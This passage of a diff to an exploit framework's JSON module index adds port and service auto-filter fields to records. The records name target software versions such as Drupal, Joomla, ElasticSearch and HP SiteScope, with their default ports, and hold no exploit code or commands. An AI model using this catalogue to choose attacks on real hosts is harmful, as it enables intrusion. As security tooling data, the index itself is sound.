"Firefox 1.5.0.0 Linux" @@ -43009,6 +56969,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43043,6 +57009,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43077,6 +57049,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43111,6 +57089,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -43146,6 +57130,12 @@ "platform": "OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OS X" ], @@ -43187,6 +57177,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43227,6 +57223,12 @@ "platform": "Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43266,6 +57268,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "J2SE 1.6_16 on Windows x86", "J2SE 1.6_16 on Mac OS X PPC", @@ -43305,6 +57313,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43351,6 +57365,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43390,6 +57410,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43430,6 +57456,12 @@ "platform": "Java,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43471,6 +57503,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43515,6 +57553,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43554,6 +57598,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43594,6 +57644,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43635,6 +57691,12 @@ "platform": "Java,Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43675,6 +57737,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43713,6 +57781,12 @@ "platform": "Java", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)" ], @@ -43747,6 +57821,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "J2SE 1.6_16 on Windows x86", "J2SE 1.6_16 on Mac OS X PPC", @@ -43780,6 +57860,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43821,6 +57907,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43858,6 +57950,12 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows Universal", @@ -43902,6 +58000,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic (Java Payload)", "Windows x86 (Native Payload)", @@ -43941,6 +58045,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox < 1.0.5, Mozilla < 1.7.10, Windows" ], @@ -43975,6 +58085,12 @@ "platform": "Linux,OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 1.5.0.4 Windows x86", "Firefox 1.5.0.4 Linux x86", @@ -44009,6 +58125,12 @@ "platform": "Ruby", "arch": "ruby", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44040,6 +58162,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Opera < 9.10 Unix Cmd" ], @@ -44076,6 +58204,12 @@ "platform": "Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Opera < 9.61 Unix Cmd" ], @@ -44112,6 +58246,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quicktime 7 on Windows x86", "Quicktime 7 on Mac OS X PPC", @@ -44151,6 +58291,21 @@ "platform": "Java", "arch": "java", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ElasticSearch 1.1.1 / Automatic" ], @@ -44187,6 +58342,21 @@ "platform": "Java", "arch": "java", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ElasticSearch 1.4.2" ], @@ -44223,6 +58393,12 @@ "platform": "Linux,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Adobe Reader Windows Universal (JS Heap Spray)", "Adobe Reader Linux Universal (JS Heap Spray)" @@ -44258,12 +58434,18 @@ "platform": "Linux,Unix,Windows", "arch": "cmd, x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix (In-Memory)", "PowerShell (In-Memory)", "Linux (Dropper)" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb", "is_install_path": true, "ref_name": "multi/fileformat/ghostscript_failed_restore", @@ -44291,6 +58473,12 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44323,6 +58511,12 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Windows X64", @@ -44362,6 +58556,12 @@ "platform": "NodeJS", "arch": "nodejs", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44393,6 +58593,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Microsoft Office Word on Windows", "Microsoft Office Word on Mac OS X (Python)" @@ -44429,6 +58635,12 @@ "platform": "Linux,Unix,Windows", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -44462,6 +58674,12 @@ "platform": "Java,NodeJS,PHP,Ruby", "arch": "nodejs, php, java, ruby", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NodeJS", "PHP", @@ -44503,6 +58721,13 @@ "platform": "", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -44540,6 +58765,13 @@ "platform": "Linux", "arch": "", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic Targeting", "Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)", @@ -44574,6 +58806,12 @@ "platform": "Linux,OSX,Unix", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "x86 (32-bit)", "x86_64 (64-bit)" @@ -44606,6 +58844,12 @@ "platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "An Unforgettable Luncheon", "Legitimate Theater" @@ -44639,6 +58883,12 @@ "platform": "Android,Apple_iOS,BSD,Java,JavaScript,Linux,Mainframe,Multi,NodeJS,OSX,PHP,Python,Ruby,Solaris,Unix,Windows", "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Wildcard Target" ], @@ -44672,6 +58922,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -44706,6 +58971,21 @@ "platform": "BSD,Linux,OSX,Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AjaXplorer 2.5.5 or older" ], @@ -44739,6 +59019,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Linux", @@ -44777,6 +59072,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Jetspeed <= 2.3.0 (Linux)", "Apache Jetspeed <= 2.3.0 (Windows)" @@ -44818,6 +59128,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -44855,6 +59180,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Apache Roller 5.0.1" ], @@ -44890,6 +59230,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "appRain 0.1.5 or less" ], @@ -44923,6 +59278,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -44956,6 +59326,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -44992,6 +59377,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java", "Windows Universal", @@ -45027,6 +59427,21 @@ "platform": "BSD,Linux", "arch": "x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Bassmaster <= 1.5.1" ], @@ -45060,6 +59475,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Bolt 2.2.4" ], @@ -45092,6 +59522,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "BuilderEngine 3.5.0" ], @@ -45126,6 +59571,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45161,6 +59621,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Cisco DCNM 6.1(2) / Java Universal" ], @@ -45194,6 +59669,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Clipbucket < 4.0.0 - Release 4902" ], @@ -45229,6 +59719,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -45263,6 +59768,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows", "Linux" @@ -45303,6 +59823,21 @@ "platform": "Unix", "arch": "cmd", "rport": 631, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45338,6 +59873,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45369,6 +59919,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CasinoLoader gateway.php" ], @@ -45406,6 +59971,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Drupal 7.0 - 7.31 (form-cache PHP injection method)", "Drupal 7.0 - 7.31 (user-post PHP injection method)" @@ -45440,6 +60020,21 @@ "platform": "Linux,PHP", "arch": "php", "rport": 4679, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -45476,6 +60071,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Eventlog Analyzer v7.0 - v8.0 / Java universal", @@ -45513,6 +60123,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45550,6 +60175,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45582,6 +60222,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -45615,6 +60270,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic GestioIP 3.0" ], @@ -45654,6 +60324,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows Powershell" @@ -45687,6 +60363,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -45719,6 +60401,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Linux (x64)", @@ -45756,6 +60453,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GitList v0.6.0" ], @@ -45788,6 +60500,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45822,6 +60549,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -45858,6 +60600,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -45891,6 +60648,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GLPI 0.84 or older" ], @@ -45927,6 +60699,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -45962,6 +60749,21 @@ "platform": "Unix,Windows", "arch": "x86, cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 / Windows", "HP SiteScope 11.20 / Linux" @@ -46002,6 +60804,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP SiteScope 11.20 / Windows 2003 SP2", "HP SiteScope 11.20 / Linux CentOS 6.3" @@ -46037,6 +60854,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Linux", @@ -46072,6 +60904,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -46111,6 +60958,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -46143,6 +61005,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -46180,6 +61057,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46220,6 +61112,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46258,6 +61165,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -46298,6 +61220,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Java based)", "Windows Universal", @@ -46335,6 +61272,21 @@ "platform": "Java", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal" ], @@ -46368,6 +61320,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows", "Linux", @@ -46404,6 +61371,21 @@ "platform": "Linux,Unix,Windows", "arch": "cmd, python, x86, x64", "rport": "8080", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix (In-Memory)", "Python (In-Memory)", @@ -46444,6 +61426,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HipChat for Jira plugin on Java", "HipChat for Jira plugin on Windows", @@ -46487,6 +61484,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Joomla 1.5.0 - 3.4.5" ], @@ -46519,6 +61531,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46554,6 +61581,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic LotusCMS 3.0" ], @@ -46590,6 +61632,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "log1 CMS 2.0" ], @@ -46627,6 +61684,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46660,6 +61732,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mako Server v2.5, 2.6" ], @@ -46693,6 +61780,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows", @@ -46733,6 +61835,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9", @@ -46768,6 +61885,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ServiceDesk Plus v9 b9000 - b9102 / Java Universal" ], @@ -46803,6 +61935,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 6262, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -46838,6 +61985,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mantis <= 1.1.3" ], @@ -46874,6 +62036,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)" ], @@ -46908,6 +62085,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -46945,6 +62137,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic PHP-CLI", "Linux CMD", @@ -46981,6 +62188,21 @@ "platform": "Ruby", "arch": "ruby", 